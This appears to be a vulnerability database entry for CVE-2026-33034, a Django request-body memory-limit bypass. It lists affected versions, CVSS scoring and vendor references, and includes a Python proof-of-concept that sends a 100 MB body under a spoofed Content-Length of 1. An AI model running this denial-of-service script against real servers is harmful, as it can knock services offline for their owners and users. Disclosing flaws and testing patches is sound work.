Security Vulnerability Report
CVE-2026-33034 CVSS 7.5 HIGH


Published: 2026-04-07 15:17:39
Last Modified: 2026-04-13 17:38:35
Source: 6a34fbeb-21d4-45e7-8e0a-62b95bc12c92

Description

An issue was discovered in Django 6.0 before 6.0.4, 5.2 before 5.2.13, and 4.2 before 4.2.30. ASGI requests with a missing or understated `Content-Length` header could bypass the `DATA_UPLOAD_MAX_MEMORY_SIZE` limit when reading `HttpRequest.body`, allowing remote attackers to load an unbounded request body into memory. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Superior for reporting this issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* - VULNERABLE (three version ranges)
Django 6.0 < 6.0.4 - VULNERABLE
Django 5.2 < 5.2.13 - VULNERABLE
Django 4.2 < 4.2.30 - VULNERABLE
Django 5.0.x (possibly affected; unsupported, not evaluated)
Django 4.1.x (possibly affected; unsupported, not evaluated)
Django 3.2.x (possibly affected; unsupported, not evaluated)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import httpx

# PoC for CVE-2026-33034
# This script attempts to send a request with a spoofed Content-Length header
# to bypass Django's DATA_UPLOAD_MAX_MEMORY_SIZE check.


def trigger_dos(url):
    # Generate a large payload (e.g., 100MB)
    payload = b"A" * (100 * 1024 * 1024)

    # Headers: Claim content length is very small (e.g., 1 byte)
    # but send the actual large payload.
    headers = {
        "Content-Type": "application/octet-stream",
        "Content-Length": "1",
    }

    try:
        with httpx.Client() as client:
            print(f"Sending malicious request to {url}...")
            # Note: Depending on the ASGI server and proxy in front,
            # standard HTTP clients might reset the connection due to framing issues.
            # This demonstrates the logic of the exploit: mismatched header vs body.
            response = client.post(url, content=payload, headers=headers, timeout=30)
            print(f"Response status: {response.status_code}")
    except Exception as e:
        print(f"Request failed (expected if connection reset or server crashed): {e}")


if __name__ == "__main__":
    target_url = "http://target-django-server/upload"
    trigger_dos(target_url)
```

Weakness

CWE-770 (Allocation of Resources Without Limits or Throttling)

References

https://www.djangoproject.com/weblog/2026/apr/07/security-releases/ (Patch, Vendor Advisory)
https://docs.djangoproject.com/en/dev/releases/security/ (Patch, Vendor Advisory)
https://groups.google.com/g/django-announce (Release Notes)